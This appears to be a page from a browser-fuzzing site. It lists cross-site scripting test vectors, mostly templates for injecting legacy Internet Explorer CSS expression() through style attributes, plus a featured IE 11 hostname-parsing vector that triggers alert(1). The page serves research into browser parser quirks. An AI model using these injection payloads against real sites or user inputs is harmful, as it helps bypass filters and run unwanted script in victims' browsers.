Featured vector

IE 11.0
<a href="/0x3035google.com" id="fuzzelement1">asdf</a> <script> if(document.getElementById('fuzzelement1').hostname=="google.com") { alert(1); } </script>

Fuzz vector cloud

5,453,920 Successful fuzzes

Fuzz Vectors

Searching for "expression"

Your browser identified as

General Crawlers unknown

All vectors

Description Vector Created by
Valid characters after expression 4 <div style="xss:expression(logChr(*num*))\*hex2* junk"></div> @garethheyes
Valid characters after expression 3 <div style="xss:expression(logChr(*num*))'*chr*junk"></div> @garethheyes
Valid characters after expression 2 <div style="xss:expression(logChr(*num*))*chr**chr*junk"></div> @garethheyes
Valid characters after expression <div style="xss:expression(logChr(*num*))*chr*junk"></div> @garethheyes
Opening paren expression check <div style="xss:expression(logChr*chr**num*))">test</div> @garethheyes
Characters breaking CSS strings allowing expression "'`>ABC<div style="font-family:'foo*chr*;x:expression(log(*num*));/*';">DEF @0x6D6172696F
Characters ending CSS values allowing expressions "'`>ABC<div style="font-family:'foo'*chr*x:expression(log(*num*));/*';">DEF @0x6D6172696F
Characters allowed between CSS expression chars 02 ABC<div style="x:expression*chr*(log(*num*))">DEF @0x6D6172696F
Characters allowed between CSS expression chars 01 ABC<div style="x:exp*chr*ression(log(*num*))">DEF @0x6D6172696F
Characters allowed between CSS colon and expression ABC<div style="x:*chr*expression(log(*num*))">DEF @0x6D6172696F
Characters allowed between CSS prop and expression ABC<div style="x*chr*expression(log(*num*))">DEF @0x6D6172696F